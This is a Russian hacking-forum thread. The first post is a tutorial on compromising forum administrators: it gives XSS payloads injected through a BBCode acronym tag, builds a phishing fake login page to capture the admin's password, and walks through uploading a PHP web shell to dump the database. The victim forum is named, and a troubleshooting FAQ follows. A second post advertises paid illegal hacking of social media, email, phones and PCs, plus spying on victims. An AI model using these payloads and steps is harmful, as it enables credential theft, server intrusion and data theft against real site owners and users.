Магазины аккаунтов и услуг:
Аккауты
Реклама на сайте. Вирустотал. Почта должна быть привязана к мобиле.
Премиум аккаунт. Домен сайта необходимо разрешить в AdBlock
PUBG

Показано с 1 по 2 из 2

Тема: Взлом БД через форум с xss

  1. #1
    Проверенные
    Регистрация
    12.02.2011
    Адрес
    Долины Мальборо
    Сообщений
    565
    Сказал(а) спасибо
    2,175
    Поблагодарили 774 раз(а)
    в 261 сообщениях
    Репутация:   18  

    Взлом БД через форум с xss

    Взлом БД через форум с xss
    Для начала давайте разберемся что нам это даст?
    1)Стать админом а больше ничего и ненадо)



    Что такое xss?

    Код:

    XSS (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты. Специфика подобных атак заключается в том, что вместо непосредственной атаки сервера они используют уязвимый сервер в качестве средства атаки на клиента.
    Иногда для термина используют сокращение «CSS», но чтобы не было путаницы с каскадными таблицами стилей, используют сокращение «XSS».Сейчас XSS составляют около 15 % всех обнаруженных уязвимостей[1]. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора). На популярном сайте скрипт может устроить DoS-атакy.

    Работает везде где имееться тег acronym в ipb

    Пример популярных серверов: Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться. (уже не актуально)

    XSS работал бы и на шоках но там слишком длиные сообщения запрещены(в подписи) а в сообщение эти теги отключены.

    Создаем фейк.


    Для начала нам нужно скачать ArxWFakeGen (Зеркало:Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться. спасибо rea1) (Антивирус скажет что там вирус, но не пугайтесь это hactool)

    Распаковываем, запускаем:
    1)В поле страница пишем путь к странице авторизации форума. Пример: Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться.
    2) В поле переадресация делаем на главную. Пример: Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться.
    3)Где тип базы выберите "Своя" и вместо base3124.dat пишим pass.txt (ну или другое название типа password.txt key.txt lol.txt и т.д.)
    4)В поле тип главной выберите htm
    5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь

    Очень часто прога создает ошибки в фейке и у вас не отображаются картинки, для этого открываем index.htm текстовым файлом ищем строчки:



    PHP код:
    <style type="text/css" media="all">

    @import url(Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться.

    </style>
    И убираем лишний адрес
    В итоге должно получиться так:


    PHP код:
    <style type="text/css" media="all">

    @import url(Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться.

    </style>
    Сохраняем и фейк готов!




    Фейк мы приготовили. Пример: Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться.
    Теперь нам нужно приготовть xss.

    Код xss выглядит таким образом:
    1) Для ie & firefox


    PHP код:
    *********************91;acronym=test1*********************91;acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); *********************93;_*********************93;___________________________________________________ ________________________*********************91;/acronym*********************93;_*********************91;/acronym*********************93;*********************91;/size*********************93;*********************91;/color*********************93;
    2) Для opera:
    Код:

    PHP код:
    *********************91;acronym=*********************91;acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); *********************93;*********************93;*********************91;/acronym*********************93;*********************91;/acronym*********************93;
    Пример с оперой Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться.

    Вместо Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться. вам нужно вставить свою ссылку на фейк. И у вас должно получиться что то вроде этого:


    Код:
    PHP код:
    *********************91;acronym=*********************91;acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://l2fan-day.ru.freehostia.com/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); *********************93;*********************93;*********************91;/acronym*********************93;*********************91;/acronym*********************93;
    Чтобы небыло видно лучше всего скрыть цветом.

    Код мы приготовили теперь нужно его вставить в подпись, для этого идем в кабинет, переходим в подпись и вставляем код.

    Теперь нужно поймать админа, для этого пишем ему в ЛС что либо про донат и т.д. и т.п.

    Код работает таким образом. Когда админ переходит на ваше лс (личное сообщение) открывается ваш фейк с адресом форума (Оо). То есть админ не впалит вас что это фейк а подумает что нить про куки и т.п.
    Когда же админ зайдет снова в ваше ЛС фейк больше НЕ ОТКРОЕТЬСЯ ^^, при переходе на фейк он получит куки в виде ibp_my=1234 и пока есть этот кук переадресовывать на фейк не будет. Но как же сделать чтобы куки стерались через 24 часа?

    setTime(getTime()+30*24*60*60*1000)
    Красным выделено количество дней, в течение которых кука будет храниться в браузере юзера.(Вам нужно изменить это в коде)

    Вот админ прочитал наш лс мы получили его пасс. Что делать дальше?А дальше мы идем в админку Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться.
    Есть несколько способов залить шелл:
    1) Через аватар
    2) Через sql
    3) Через настройки форума

    Первый наиболее легки поэтому я вам про него расскажу.
    В админке идем Форумы->Прикрепляемые файлы->Типы файлов
    жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да. Топаем в свой профиль:

    Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться.

    грузим аву-шелл с расширением php3, смотрим адрес вашего аватара переходим по нему и получаем шелл.

    Далее залазим в самый корень и ищем config файл с логин и пассом от мускула, ну а дальше подключаемся сливаем бд и т.д.


    Таким образом мной было взломано очень много серверов, первой жертвой как вы уже догадались был сервер l2fan-day.ru.

    Хочешь знать как фиксануть данную багу? ЖМИ СЮДА!

    Для этого в админке где bb коды тебе просто нужно отключить либо удалить тег arconym


    Все вопросы только в эту тему, именно для этого я её создал! В icq не писать, всё равно не отвечу.

    Удачи!

    Уже появились первые вопросы.


    FAQ:

    Вопрос: Так получается админ еще должен в фейк ввести логин пасс свой?Так он не глупый не введет.
    Ответ: Адрес будет Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться. форум.com/index.php?act=Msg&CODE=01 а страница фейковая, т.е. адрес не поменяется

    Вопрос: Так значит название домена не повлияет?
    Ответ: Не повлияет

    Вопрос: чтобы и на ИЕ и на Оперу фейк переадресовывал можно в подписи оба кода вставить?
    Ответ: Да
    Вопрос: Почему у меня в фейке не отображаються картинки?
    Ответ: Прочитай статью занова и внимательно!

    Вопрос: Где смотреть пароли? or вопрос,а где будет пароль админа?
    Ответ: В файле txt (pass.txt и т.д. и т.п.)

    Вопрос: Какой хостинг выбрал ты?
    Ответ: Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться. но для этого вам придеться и зарегать почту на fromru.com или gmail.com, ещё хостинги: 1gb.ru, hum.ru

    Вопрос: Как поменять сообщение под цвет форума?
    Ответ: Используй bb код [*COLOR="цвет"][/COLOR*] (без *)

    Вопрос: Создал фейк но при вводе логина и пасса выходит вот такая ошибка:

    PHP код:
    Warning: Unknown: open_basedir restriction in effect. File(/home/vov/l/2/t/l2toy/public_html/login.php) is not within the allowed path(s): (/nonexistent) in Unknown on line 0

    Warning: Unknown: failed to open stream: Operation not permitted in Unknown on line 0

    Fatal error: Unknown: Failed opening required '/home/vov/l/2/t/l2toy/public_html/login.php' (include_path='.:/usr/local/share/pear') in Unknown on line 0
    Ответ: Меняй хостинг либо ставь права чмод 777

    Вопрос: Где найти такие форумы?
    Ответ: Приступай

    Вопрос: Программа создала фейк но там не понятна кодировка, всякие квадратики и т.д
    Ответ:В программе, внизу где 'Дополнительная замена строк'
    Введите в поле 'C' => charset=utf-8
    Введите в поле 'На' => charset=windows-1251

    Вопрос:Как можно небольшие белые полоски сверху и сбоку убрать
    Ответ:В коде вместо x20width=100%\x20height=100% вставь x20width=1024\x20height=768

    Вопрос:как сделать так, чтобы прокрутка (скрол) была только вертикальная?
    Ответ:никак

    Вопрос: Какой шелл лучше всего юзать?
    Ответ: Я вам предлагаю WSO после залития попросит пароль введите root

    Вопрос: ты сможешь ламануть для меня ?
    Ответ нет это меня до смерти надоело)


    На таких скинах как Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться. Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться. Для просмотра внешних ссылок необходимо зарегистрироваться (и подтвердить мыло) либо авторизоваться. asterios и т.д. непашет


    ПРОШУ ВНИМАНИЯ!
    В коде где x3C****** поменяйте на x3Cifr*ame (без*) везде , т.к. форум жрет этот кусок кода!
    копипаст с рфчитс

  2. #2
    Junior Member
    Регистрация
    18.11.2019
    Сообщений
    9
    Сказал(а) спасибо
    0
    Поблагодарили 0 раз(а)
    в 0 сообщениях
    Репутация:   0  
    Профессиональные услуги взлома:
    1.Взлом социальных сетей, работаем с зарубежными сетями.
    - взлом вконтакте, взлом vk
    - взлом facebook
    - взлом ok, взлом одноклассники
    - взлом мамба
    - взлом loveplanet
    И любых других социальных сетей.
    2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
    - yahoo.com
    - live.com
    - mail.com
    - aol.com
    - hotmail.com
    - mail.ru
    - yandex.ru
    - bk.ru
    - rambler.ru и пр.
    - Любая коропоративная или экзотическая почта будет вскрыта...
    3. Взлом Skype и любой другой телефонии.
    4.- Взлом viber
    - whatsapp и любых других приложений.
    5.Взлом сайтов и web проектов любой сложности и тематики
    - Форумы
    - Бизнес сайты
    - Сайты визитки
    - Коропоративные сайты
    И любые другие сайты.
    - Анонимность и конфиденциальность полностью соблюдается
    - Разумные цены
    - Индивидуальный подход к каждому клиенту
    - Простейшая и удобная система оплаты: яндекс деньги, webmoney, киви или просто на мобильный телефон которые можно оплатить в любом платёжном терминале
    - Постоянным клиентам - солидные скидки
    - Профессиональное обучение взлому, результат успешного обучения 100%.
    6.Удаление и очистка кредитной истории
    7.РАСПЕЧАТКА ЗВОНКОВ И СМС

    ВЗЛОМ САЙТОВ ЗНАКОМСТВ

    ПОМОЖЕМ ОТЧИСТИТЬ КРЕДИТНУЮ ИСТОРИЮ

    УДАЛЕНИЕ ОТЗЫВОВ, КОММЕНТАРИЕВ
    8.Получение удаленного доступа к пк
    - Mac, Win, Unix и пр.
    - Получу удаленный доступ к любому пк, выкачаю файлы, удалю файлы, заблокирую доступ и любые даже экстравагантые просьбы.
    9. Удалю все, что мешает в интернете, очищу любые ресурсы : блоги, форума, каналы ютуб, новостные ресурсы и даже БАЗЫ ДАННЫХ любых учереждений.
    - Очистим любую информацию, что есть в сети, готовы почистить поисковые системы, чтобы не выдавали информацию по нужному запросу. Можете обращаться к нам сделаем в лучшем виде.
    10.Вариант получения удаленного доступа к телефону и выкачке/удалению любой информации/слежения за жертвой.
    ОБРАЩАТЬСЯ:
    *Почта: [email protected]
    *Вконтакте:vk.com/pomosh.vzloma

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Реклама на сайте
Abuse here pv[email protected] Жалобы слать сюда [email protected]
При использовании материалов сайта указание источника обязательно.
Форум всегда нуждается в развитии приоритетных разделов.
http://pvpru_com.livejournal.com/ - Аварийный блог
RSS




Сайт предназначен для просмотра только людьми старше 18 лет.